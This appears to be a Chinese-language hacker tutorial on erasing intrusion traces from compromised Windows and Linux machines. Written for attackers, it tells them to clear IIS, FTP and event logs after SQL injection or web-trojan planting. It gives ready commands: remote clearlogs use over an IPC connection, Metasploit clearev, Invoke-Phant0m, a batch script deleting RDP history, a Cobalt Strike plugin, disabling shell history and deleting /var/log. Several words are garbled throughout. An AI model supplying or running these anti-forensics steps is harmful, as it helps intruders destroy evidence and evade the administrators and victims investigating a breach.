windows入侵痕跡清理
日誌清理
為了方便管理員瞭解掌握電腦的執行狀態,Windows提供了完善的日誌功能,將系統服務、許可權設定、軟體執行等相關事件分門別類詳細記錄於日誌之中。所以,透過觀察、分析系統日誌,有經驗的管理員不但可以瞭解駭客對系統做了哪些改動,甚至還可能會找出入侵的來源,例如從ftp日誌找出駭客登入的lP地址。為此,清除日誌幾乎成為駭客入門的必修課。
WndowsXP作業系統為例,它的日誌系統由預設提供的日誌、防火牆日誌、ns伺服器日誌三大類組成。
1.預設提供的日誌
Windows系統預設提供應用程式日誌、安全性日誌和系統日誌。應用程式主要記錄應用程式執行時出現的錯誤和特效事件。
例如:停止響應、資料啟動、停止等。安全性日誌用於記錄管理員指定的稽核事項,假如管理員沒有在組策略中指定需要稽核的內容及稽核的方向,說明此日誌為空白狀態。
系統日誌用於記錄各類系統執行的資訊。例如Telnet服務啟動後,系統日誌將會記錄該服務啟動的時間,並留下一條關elnet服務正處於執行狀態的描述。
從以上的分析不難看出,對於沒有安裝附加元件的“肉雞”而言,系統日誌是清除的首要目標。
2.防火牆日誌
防火牆日誌預設處於關閉狀態,管理員啟用了防火牆日誌記錄功能後,就會在vrindows目錄內自動生成pfuwall。log檔案,並記錄相應的連線內容。假如找不到這個檔案,則說明管理員沒有啟用防火牆日誌功能
3.IIS日誌
若使用者安裝了IIS伺服器元件,就可以在“%systemroot%\system32\logfles\”中找到FTP、Web、Ils伺服器等同志。
HTTPERR資料夾中存放的日誌檔案記錄著Web執行、響應出錯等資訊,主要用於排解故障及最佳化Web服務,對駭客而言,其意義不大。
W3SVCl資料夾用於存放lP地址、使用者名稱、伺服器埠、使用者所訪問的UiRI資源、發出的URI查求等資訊,管理員透過分析此檔案可以找出駭客入侵的各種痕跡,所以,完成SQL注入、網站掛馬等操作後,務必要清除此檔案。
MSFTPSVC1資料夾儲存著FTP日誌,與前面介紹的Web、IIS日誌相比,FTP日誌更詳細,不但包含使用者登入操作,還包含使用者的各種操作請求,例如記錄使用者利用UNICODE漏洞入侵伺服器,就會留下相當多與cmd。exe有關的記錄,所以,在成功入侵後,此日誌須及時清除
日誌清理
Eventvwr。msc
右鍵 屬性 清楚日誌
如果我們不想手工清除,我們可以下載clearlog。exe
使用方法:Usage: clearlogs [\\computername] <-app / -sec / -sys>
-app = 應用程式日誌 -sec = 安全日誌 -sys = 系統日誌a。 可以清除遠端計算機的日誌** 先用ipc連線上去: net use \\ip\ipc$ 密碼/user:使用者名稱** 然後開始清除: 方法 clearlogs \\ip -app 這個是清除遠端計算機的應用程式日誌clearlogs \\ip -sec 這個是清除遠端計算機的安全日誌clearlogs \\ip -sys 這個是清除遠端計算機的系統日誌
b。清除本機日誌: 如果和遠端計算機的不能空連線。 那麼就需要把這個工具傳到遠端計算機上面 然後清除。 方法:
clearlogs -app 這個是清除遠端計算機的應用程式日誌clearlogs -sec 這個是清除遠端計算機的安全日誌clearlogs -sys 這個是清除遠端計算機的系統日誌
安全日誌已經被清除。Success: The log has been cleared 成功。
破壞Windows日誌記錄功能
利用工具
· Invoke-Phant0m https://github。com/hlldz/Invoke-Phant0m
· Windwos-EventLog-Bypass https://github。com/3gstudent/Windows-EventLog-Bypass
msf
run clearlogs
clearev
3389登陸記錄清除
@echo off
@reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” /va /f
@del “%USERPROFILE%\My Documents\Default。rdp” /a
@exit
Cobaltstricke外掛:EventLogMaster-master
檢視日誌
在cs上線上的機器ClearAll
OK!
雖然這裡講的是windows的痕跡清理,也大概講下linux的
1:在獲取許可權後,執行以下命令,不會記錄輸入過的命令
export HISTFILE=/dev/null export HISTSIZE=0
· 1
2:刪除 /var/log 目錄下的日誌檔案
3:如果是web應用,找到web日誌檔案,刪除
異曲同工